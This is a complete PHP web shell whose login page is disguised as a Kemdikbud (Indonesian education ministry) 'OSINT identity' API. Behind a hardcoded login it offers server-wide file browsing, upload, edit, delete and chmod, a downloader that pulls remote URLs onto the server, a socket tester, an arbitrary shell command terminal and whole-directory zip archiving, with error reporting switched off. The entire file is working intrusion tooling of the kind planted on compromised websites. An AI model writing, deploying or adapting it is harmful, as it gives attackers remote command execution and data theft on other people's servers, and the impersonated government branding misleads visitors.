<?php
error_reporting(0);
session_start();
$users = array(
    'seobasah' => '$2a$12$oGrBBXmn5Wh1fyeJRTP0GugAbIbGOsvWyNBhNYPsMZbC94e/6SnnW'
);
if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ?');
    exit;
}

if (!empty($_SESSION['login_user'])) {
    // handle inline AJAX rename separately before rendering manager
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ajax']) && $_POST['ajax'] === 'rename_inline') {
        // simple AJAX rename handler: expects dir, old, new
        $dir = isset($_POST['dir']) ? $_POST['dir'] : '';
        $old = isset($_POST['old']) ? $_POST['old'] : '';
        $new = isset($_POST['new']) ? $_POST['new'] : '';
        $dir = @realpath($dir) ? @realpath($dir) : $dir;
        $oldPath = $dir . DIRECTORY_SEPARATOR . $old;
        $newPath = $dir . DIRECTORY_SEPARATOR . $new;
        $resp = array('ok' => false, 'msg' => 'Rename failed');
        if ($old === '' || $new === '' || $dir === '') {
            $resp['msg'] = 'Invalid parameters';
        } elseif (!file_exists($oldPath)) {
            $resp['msg'] = 'Original item not found';
        } else {
            if (@rename($oldPath, $newPath)) {
                $resp['ok'] = true;
                $resp['msg'] = 'Rename success';
            } else {
                $resp['msg'] = 'Rename error (permissions?)';
            }
        }
        header('Content-Type: application/json');
        echo json_encode($resp);
        exit;
    }

    // show manager
    show_file_manager();
    exit;
}

$err = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['ajax'])) {
    $u = trim(isset($_POST['username']) ? $_POST['username'] : '');
    $p = isset($_POST['password']) ? $_POST['password'] : '';
    if ($u === '' || $p === '') {
        $err = 'Isi username dan password.';
    } elseif (!isset($users[$u]) || !password_verify($p, $users[$u])) {
        $err = 'Username atau password salah.';
    } else {
        session_regenerate_id(true);
        $_SESSION['login_user'] = $u;
        header('Location: ?');
        exit;
    }
}

?><!doctype html>
<html lang="id">
<head>
<meta charset="utf-8">
<title>Login - Access Api Kemdikbud</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<style>
body{background:#0f1720;color:#e6eef8;font-family:Inter,system-ui,Arial,sans-serif;display:flex;align-items:center;justify-content:center;height:100vh;margin:0}
.card{background:#071024;padding:28px;border-radius:10px;box-shadow:0 8px 30px rgba(0,0,0,.6);width:360px}
h2{margin:0 0 12px 0}
input{width:100%;padding:10px;margin:8px 0;border-radius:6px;border:1px solid rgba(13, 41, 68, 1);background:#03244f;color:#e6eef8;box-sizing:border-box}
button{background:#0ea5a4;color:#012; padding:10px 14px;border-radius:6px;border:none;cursor:pointer;font-weight:600}
.err{color:#ffb4b4;margin-top:8px}
.small{color:#94a3b8;font-size:13px;margin-top:8px}
</style>
</head>
<body>
<div class="card">
  <h2>Login - Access Api Kemdikbud</h2>
  <form method="post">
    <input name="username" placeholder="NIK" required>
    <input name="password" type="password" placeholder="NIP" required>
    <button type="submit">Masuk</button>
  </form>
  <?php if ($err): ?><div class="err"><?php echo htmlspecialchars($err); ?></div><?php endif; ?>
  <div class="small">Super Api Osint Kemdikbud For Find Identity People ©Creator By Kemdikbud</div>
</div>
</body>
</html>
<?php

function in_private_range($ip) {
    if ($ip === '127.0.0.1' || $ip === '::1') return true;
    $long = ip2long($ip);
    if ($long === false) return false;
    if (($long & 0xff000000) === ip2long('10.0.0.0')) return true;
    if (($long & 0xfff00000) === ip2long('172.16.0.0')) return true;
    if (($long & 0xffff0000) === ip2long('192.168.0.0')) return true;
    return false;
}
function is_allowed_target($host) {
    $host = trim($host);
    if ($host === '') return false;
    if (filter_var($host, FILTER_VALIDATE_IP)) return in_private_range($host);
    $resolved = @gethostbyname($host);
    if ($resolved === $host) return false;
    if (in_private_range($resolved)) return true;
    $srv = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : gethostname();
    if ($host === $srv || $host === gethostname()) return true;
    return false;
}
function safe_download_to($url, $dest) {
    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $data = curl_exec($ch);
        $err = curl_error($ch);
        curl_close($ch);
        if ($data === false) return array(false, "cURL error: $err");
        if (file_put_contents($dest, $data) === false) return array(false, "Failed write file");
        return array(true, "Saved to $dest");
    } else {
        $opts = @file_get_contents($url);
        if ($opts === false) return array(false, "file_get_contents failed");
        if (file_put_contents($dest, $opts) === false) return array(false, "Failed write file");
        return array(true, "Saved to $dest");
    }
}

function show_file_manager() {
    $BASE_DIR = getcwd();
    $dir = isset($_GET['dir']) ? $_GET['dir'] : $BASE_DIR;
    $dir = @realpath($dir);
    if ($dir === false) $dir = $BASE_DIR;
    $files = @scandir($dir);
    if ($files === false) $files = array();

    
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['buatfolder']) && !empty($_POST['newfolder'])) {
        $new = $dir . DIRECTORY_SEPARATOR . trim($_POST['newfolder']);
        @mkdir($new);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['buatfile']) && !empty($_POST['newfile'])) {
        $new = $dir . DIRECTORY_SEPARATOR . trim($_POST['newfile']);
        @touch($new);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload']) && !empty($_FILES['upload_file'])) {
        $f = $_FILES['upload_file'];
        $cnt = count($f['name']);
        for ($i=0;$i<$cnt;$i++){
            if ($f['error'][$i] !== UPLOAD_ERR_OK) continue;
            $name = basename($f['name'][$i]);
            $target = $dir . DIRECTORY_SEPARATOR . $name;
            @move_uploaded_file($f['tmp_name'][$i], $target);
        }
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if (isset($_GET['delete'])) {
        $del = $dir . DIRECTORY_SEPARATOR . $_GET['delete'];
        if (is_dir($del)) @rmdir($del); else @unlink($del);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if (isset($_GET['rename']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ren']) && !empty($_POST['newname'])) {
        $item = $_GET['rename'];
        @rename($dir . DIRECTORY_SEPARATOR . $item, $dir . DIRECTORY_SEPARATOR . $_POST['newname']);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if (isset($_GET['chmod']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ch']) && !empty($_POST['perm'])) {
        $item = $_GET['chmod'];
        $p = intval($_POST['perm'], 8);
        @chmod($dir . DIRECTORY_SEPARATOR . $item, $p);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if (isset($_GET['view']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save'])) {
        $file = $dir . DIRECTORY_SEPARATOR . $_GET['view'];
        @file_put_contents($file, $_POST['content']);
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['wget_submit'])) {
        $url = trim($_POST['wget_url']);
        $save = trim($_POST['wget_name']);
        if ($url !== '' && $save !== '') {
            $dest = $dir . DIRECTORY_SEPARATOR . basename($save);
            safe_download_to($url, $dest);
        }
        header('Location: ?dir='.urlencode($dir)); exit;
    }
    
    $gsocket_msg = '';
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['gsocket_test'])) {
        $host = trim($_POST['gsocket_host']);
        $port = intval($_POST['gsocket_port']);
        if ($host === '' || $port <= 0) { $gsocket_msg = 'Host/port invalid'; }
        else {
            if (!is_allowed_target($host)) { $gsocket_msg = 'Target not allowed'; }
            else {
                $t = 5;
                $fp = @fsockopen($host, $port, $errno, $errstr, $t);
                if ($fp) { $gsocket_msg = "OK $host:$port"; fclose($fp); }
                else $gsocket_msg = "Fail $host:$port — $errstr ($errno)";
            }
        }
    }
    
    $term_output = '';
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['exec']) && !empty($_POST['cmd'])) {
        $cmd = $_POST['cmd'];
        if (function_exists('shell_exec')) $term_output = shell_exec($cmd . " 2>&1");
        elseif (function_exists('exec')) { $out = array(); exec($cmd . " 2>&1", $out); $term_output = implode("\n", $out); }
        else $term_output = "shell_exec/exec disabled";
    }

    
    $backup_msg = '';
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['backup'])) {
        $timestamp = date('Ymd_His');
        $basename = preg_replace('#[^A-Za-z0-9_\-]#', '_', basename($dir));
        if ($basename === '') $basename = 'backup';
        $backdir = $dir . DIRECTORY_SEPARATOR . 'backups';
        if (!is_dir($backdir)) @mkdir($backdir, 0755, true);
        $zipname = $basename . '_' . $timestamp . '.zip';
        $zippath = $backdir . DIRECTORY_SEPARATOR . $zipname;
        if (class_exists('ZipArchive')) {
            $zip = new ZipArchive();
            if ($zip->open($zippath, ZipArchive::CREATE) === TRUE) {
                $filesIt = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
                foreach ($filesIt as $fileinfo) {
                    $file = $fileinfo->getRealPath();
                    if ($file === false) continue;
                    // skip backups folder itself
                    if (strpos($file, $backdir) === 0) continue;
                    // skip . and ..
                    if ($fileinfo->getBasename() === '.' || $fileinfo->getBasename() === '..') continue;
                    $local = substr($file, strlen($dir) + 1);
                    if ($fileinfo->isDir()) { if ($local !== '') $zip->addEmptyDir($local); }
                    else $zip->addFile($file, $local);
                }
                $zip->close();
                $backup_msg = "Backup created: backups/$zipname";
            } else $backup_msg = "ZipArchive failed";
        } else {
            // fallback exec zip
            $cwd = dirname($dir);
            $cmd = 'zip -r ' . escapeshellarg($zippath) . ' ' . escapeshellarg(basename($dir));
            @exec('cd ' . escapeshellarg($cwd) . ' && ' . $cmd . ' 2>&1', $out, $ret);
            if ($ret === 0) $backup_msg = "Backup created: backups/$zipname";
            else $backup_msg = "Backup failed (no ZipArchive and system zip failed)";
        }
        header('Location: ?dir='.urlencode($dir).'&backup_msg='.urlencode($backup_msg));
        exit;
    }

    
    $backup_msg_get = isset($_GET['backup_msg']) ? $_GET['backup_msg'] : '';

    
    ?>
    <!doctype html>
    <html lang="id"><head><meta charset="utf-8"><title>Manager</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
    body{font-family:Inter,system-ui,monospace;background:#071022;color:#e6eef8;padding:14px}
    .bar{display:flex;justify-content:space-between;align-items:center;margin-bottom:12px}
    .btn{background:#0ea5a4;color:#012;padding:6px 10px;border-radius:6px;text-decoration:none;margin-left:6px;font-weight:600}
    .btn-alt{background:#0369a1}
    .btn-danger{background:#ef4444}
    .box{background:#021126;padding:12px;border-radius:8px}
    table{width:100%;border-collapse:collapse;margin-top:12px}
    th,td{padding:8px;border-bottom:1px solid #072032;text-align:left;vertical-align:middle}
    .actions{display:flex;gap:6px;flex-wrap:wrap}
    input.small{padding:6px;border-radius:6px;border:1px solid #123;background:#041026;color:#e6eef8}
    .notice{background:#04202b;color:#bfeaf8;padding:8px;border-radius:6px;margin-bottom:10px}
    pre{background:#001219;color:#cff7ff;padding:10px;border-radius:6px;overflow:auto;white-space:pre-wrap}
    .inline-input{width:220px;padding:6px;border-radius:6px;border:1px solid #123;background:#041026;color:#e6eef8}
    .link{color:#7dd3fc}
    </style>
    <script>
    // Inline rename via AJAX (vanilla)
    function startRename(dir, oldName, elId) {
        var cell = document.getElementById(elId);
        if (!cell) return;
        // build html input
        var input = document.createElement('input');
        input.type = 'text'; input.value = oldName; input.className = 'inline-input';
        var btnOk = document.createElement('button'); btnOk.innerText = 'OK'; btnOk.className='btn btn-alt';
        var btnCancel = document.createElement('button'); btnCancel.innerText = 'Cancel'; btnCancel.className='btn';
        // clear cell and append
        cell.innerHTML = '';
        cell.appendChild(input);
        cell.appendChild(btnOk);
        cell.appendChild(btnCancel);
        input.focus();

        btnCancel.onclick = function(e){ e.preventDefault(); location.reload(); };
        btnOk.onclick = function(e){
            e.preventDefault();
            var newName = input.value;
            if (newName === '' || newName === oldName) { location.reload(); return; }
            // ajax post
            var xhr = new XMLHttpRequest();
            xhr.open('POST', '?', true);
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            var params = 'ajax=rename_inline&dir=' + encodeURIComponent(dir) + '&old=' + encodeURIComponent(oldName) + '&new=' + encodeURIComponent(newName);
            xhr.onreadystatechange = function(){
                if (xhr.readyState === 4) {
                    try {
                        var res = JSON.parse(xhr.responseText);
                        if (res.ok) location.reload();
                        else alert('Rename failed: ' + res.msg);
                    } catch(e) { alert('Unexpected response'); }
                }
            };
            xhr.send(params);
        };
    }
    </script>
    </head><body>
    <div class="bar">
        <div><strong>Manager</strong> — <?php echo htmlspecialchars($_SESSION['login_user']); ?>
            <div style="font-size:12px;color:#94a3b8">Path: <?php echo htmlspecialchars($dir); ?></div>
        </div>
        <div>
            <a class="btn" href="?dir=<?php echo urlencode($dir); ?>">Home</a>
            <a class="btn btn-alt" href="?dir=<?php echo urlencode(dirname($dir)); ?>">Up</a>
            <a class="btn btn-alt" href="?dir=<?php echo urlencode($dir); ?>&terminal=1">Terminal</a>
            <a class="btn btn-alt" href="?dir=<?php echo urlencode($dir); ?>&wget=1">Wget</a>
            <a class="btn btn-alt" href="?dir=<?php echo urlencode($dir); ?>&gsocket=1">GSocket</a>
            <a class="btn btn-alt" href="?dir=<?php echo urlencode($dir); ?>&backup=1">Backup Zip</a>
            <a class="btn btn-danger" href="?logout=1">Logout</a>
        </div>
    </div>

    <div class="box">
        <?php if ($backup_msg_get): ?><div class="notice"><?php echo htmlspecialchars($backup_msg_get); ?></div><?php endif; ?>
        <?php if ($backup_msg): ?><div class="notice"><?php echo htmlspecialchars($backup_msg); ?></div><?php endif; ?>
        <?php if (!empty($gsocket_msg)): ?><div class="notice"><?php echo htmlspecialchars($gsocket_msg); ?></div><?php endif; ?>

        <div style="margin-bottom:10px">
            <form method="post" enctype="multipart/form-data" style="display:inline-block;margin-right:8px">
                <input type="file" name="upload_file[]" multiple>
                <button class="btn" name="upload">Upload</button>
            </form>

            <form method="post" action="?dir=<?php echo urlencode($dir); ?>" style="display:inline-block;margin-right:8px">
                <input class="small" name="newfolder" placeholder="New folder">
                <button class="btn" name="buatfolder">Create Folder</button>
                <input class="small" name="newfile" placeholder="New file">
                <button class="btn" name="buatfile">Create File</button>
            </form>

            <?php if (isset($_GET['wget'])): ?>
            <form method="post" style="display:inline-block;margin-left:8px">
                <input class="small" name="wget_url" placeholder="https://example.com/file.bin" style="width:45%">
                <input class="small" name="wget_name" placeholder="save_as.ext" style="width:18%">
                <button class="btn" name="wget_submit">Download</button>
            </form>
            <?php endif; ?>

            <?php if (isset($_GET['gsocket'])): ?>
            <form method="post" style="display:inline-block;margin-left:8px">
                <input class="small" name="gsocket_host" placeholder="127.0.0.1" style="width:28%">
                <input class="small" name="gsocket_port" placeholder="22" style="width:10%">
                <button class="btn" name="gsocket_test">Test</button>
            </form>
            <?php endif; ?>
        </div>

        <table>
        <thead><tr><th>Name</th><th>Type</th><th>Size</th><th>Perm</th><th>Owner</th><th>Modified</th><th>Action</th></tr></thead>
        <tbody>
        <?php
        $i = 0;
        foreach ($files as $it):
            if ($it === '.') continue;
            $full = $dir . DIRECTORY_SEPARATOR . $it;
            $isDir = is_dir($full);
            $type = $isDir ? 'dir' : (is_file($full) ? 'file' : 'other');
            $size = $isDir ? '-' : (is_file($full) ? filesize($full) . ' B' : '-');
            $perm = @substr(sprintf('%o', @fileperms($full)), -4);
            if (function_exists('posix_getpwuid')) {
                $pinfo = @posix_getpwuid(@fileowner($full));
                if (is_array($pinfo) && isset($pinfo['name'])) $owner = $pinfo['name']; else $owner = @fileowner($full);
            } else $owner = @fileowner($full);
            $safeId = 'namecell_' . $i;
        ?>
        <tr>
            <td>
                <?php if ($it === '..'): ?>
                    <a class="link" href="?dir=<?php echo urlencode(dirname($dir)); ?>">⬆️ ..</a>
                <?php elseif ($isDir): ?>
                    <a class="link" href="?dir=<?php echo urlencode($full); ?>">📁 <?php echo htmlspecialchars($it); ?></a>
                <?php else: ?>
                    <a class="link" href="?dir=<?php echo urlencode($dir); ?>&view=<?php echo urlencode($it); ?>"><?php echo htmlspecialchars($it); ?></a>
                <?php endif; ?>
            </td>
            <td><?php echo $type; ?></td>
            <td><?php echo $size; ?></td>
            <td><?php echo htmlspecialchars($perm); ?></td>
            <td><?php echo htmlspecialchars($owner); ?></td>
            <td><?php echo (is_file($full) || is_dir($full) ? date("Y-m-d H:i:s", @filemtime($full)) : '-'); ?></td>
            <td>
                <div class="actions">
                    <?php if (!$isDir): ?>
                        <a class="btn btn-alt" href="?dir=<?php echo urlencode($dir); ?>&view=<?php echo urlencode($it); ?>">Edit</a>
                        <a class="btn" href="?dir=<?php echo urlencode($dir); ?>&action=download&item=<?php echo urlencode($it); ?>">Download</a>
                    <?php endif; ?>
                    <a class="btn" href="javascript:void(0)" onclick="startRename('<?php echo addslashes($dir); ?>','<?php echo addslashes($it); ?>','<?php echo $safeId; ?>')">Rename</a>
                    <a class="btn" href="?dir=<?php echo urlencode($dir); ?>&chmod=<?php echo urlencode($it); ?>">Chmod</a>
                    <a class="btn btn-danger" href="?dir=<?php echo urlencode($dir); ?>&delete=<?php echo urlencode($it); ?>" onclick="return confirm('Delete <?php echo htmlspecialchars(addslashes($it)); ?> ?')">Delete</a>
                </div>
                <!-- inline cell for rename -->
                <div id="<?php echo $safeId; ?>" style="margin-top:6px"></div>
            </td>
        </tr>
        <?php
        $i++;
        endforeach;
        ?>
        </tbody></table>

        <!-- view/edit panel -->
        <?php if (isset($_GET['view'])):
            $file = $dir . DIRECTORY_SEPARATOR . $_GET['view'];
            if (is_file($file)):
                $isi = htmlspecialchars(@file_get_contents($file));
        ?>
            <h4>Edit File: <?php echo htmlspecialchars(basename($file)); ?></h4>
            <form method="post"><textarea name="content" rows="12" style="width:100%"><?php echo $isi; ?></textarea><br>
            <button class="btn" name="save">Save</button></form>
        <?php endif; endif; ?>

        <!-- rename fallback (non-ajax) -->
        <?php if (isset($_GET['rename'])): $item = $_GET['rename']; ?>
            <h4>Rename: <?php echo htmlspecialchars($item); ?></h4>
            <form method="post"><input class="small" name="newname" placeholder="New name"><button class="btn" name="ren">Rename</button></form>
        <?php endif; ?>

        <!-- chmod panel -->
        <?php if (isset($_GET['chmod'])): $item = $_GET['chmod']; $curPerm = @substr(sprintf('%o', @fileperms($dir.'/'.$item)), -4); ?>
            <h4>Chmod: <?php echo htmlspecialchars($item); ?> (<?php echo htmlspecialchars($curPerm); ?>)</h4>
            <form method="post"><input class="small" name="perm" placeholder="0777"><button class="btn" name="ch">Apply</button></form>
        <?php endif; ?>

        <!-- download action -->
        <?php if (isset($_GET['action']) && $_GET['action'] === 'download' && isset($_GET['item'])):
            $target = $dir . DIRECTORY_SEPARATOR . $_GET['item'];
            if (is_file($target)) {
                header('Content-Description: File Transfer');
                header('Content-Type: application/octet-stream');
                header('Content-Disposition: attachment; filename="'.basename($target).'"');
                header('Content-Length: ' . filesize($target));
                readfile($target); exit;
            } else { echo "<div class='notice'>File not found.</div>"; }
        endif; ?>

        <!-- wget panel -->
        <?php if (isset($_GET['wget'])): ?>
            <h4>Wget-like</h4>
            <form method="post">
                <input class="small" name="wget_url" placeholder="https://example.com/file.bin" style="width:60%">
                <input class="small" name="wget_name" placeholder="save_as.ext" style="width:20%">
                <button class="btn" name="wget_submit">Download</button>
            </form>
        <?php endif; ?>

        <!-- gsocket panel -->
        <?php if (isset($_GET['gsocket'])): ?>
            <h4>GSocket</h4>
            <form method="post">
                <input class="small" name="gsocket_host" placeholder="127.0.0.1" style="width:30%">
                <input class="small" name="gsocket_port" placeholder="22" style="width:10%">
                <button class="btn" name="gsocket_test">Test</button>
            </form>
        <?php if ($gsocket_msg) echo '<div class="notice">'.htmlspecialchars($gsocket_msg).'</div>'; endif; ?>

        <!-- terminal -->
        <?php if (isset($_GET['terminal'])): ?>
            <h4>Terminal</h4>
            <form method="post"><input class="small" name="cmd" placeholder="ls -la" style="width:70%"><button class="btn" name="exec">Run</button></form>
            <?php if ($term_output !== ''): ?><h5>Output:</h5><pre><?php echo htmlspecialchars($term_output); ?></pre><?php endif; ?>
        <?php endif; ?>

        <!-- backup form -->
        <?php if (isset($_GET['backup'])): ?>
            <h4>Backup Zip</h4>
            <form method="post"><button class="btn" name="backup">Create ZIP backup (saved into backups/)</button></form>
        <?php endif; ?>

    </div>

    </body></html>
    <?php
    exit;
}
?>
